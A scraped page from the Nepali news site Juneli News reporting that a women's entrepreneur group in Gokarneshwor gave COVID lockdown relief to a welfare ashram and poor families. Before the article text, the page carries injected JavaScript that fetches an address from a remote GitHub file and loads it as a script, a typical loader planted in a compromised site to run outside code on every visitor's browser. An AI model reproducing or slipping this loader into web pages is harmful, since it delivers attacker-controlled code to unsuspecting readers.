;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); उद्यमशील महिला समूहले जानजाती कल्याण आश्रम र विपन्न वर्गलाई दियो राहात – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • उद्यमशील महिला समूहले जानजाती कल्याण आश्रम र विपन्न वर्गलाई दियो राहात
गोकर्नेश्वोर बिशेष

उद्यमशील महिला समूहले जानजाती कल्याण आश्रम र विपन्न वर्गलाई दियो राहात

जुनेली न्युज, काठमाडौं ।

गोकर्णेश्वर नगरपालिका वडा नं ४ मा अवस्थित उद्यमशील महिला समूहले २०७८ जेठ ५ गते शनिबार  मूलपानीमा अवस्थित जनजाति कल्याण आश्रम नेपाललाई राहत प्रदान गरेको छ ।

समूहले सोही दिन समूहकै कार्यालय अत्तर्खेलमा गरीब तथा विपन्न वर्गलाई समेत राहत तथा स्वास्थ्य सामाग्री वितरण गरेको थियो ।


लक डाउन का कारण पीडित गरीब तथा विपन्न वर्गलाई केही सहयोग पुगोस् भन्ने हेतुले राहात वितरण गरेको समुहकी अध्यक्ष प्रमी शेर्पाले बताउनु भयो । कार्यक्रममा नेपाल दलित विद्यार्थी सङ्का केन्द्रीय अध्यक्ष राजु सुनार को समेत उपस्थिति थियो ।

फेसबुक प्रतिक्रियाहरु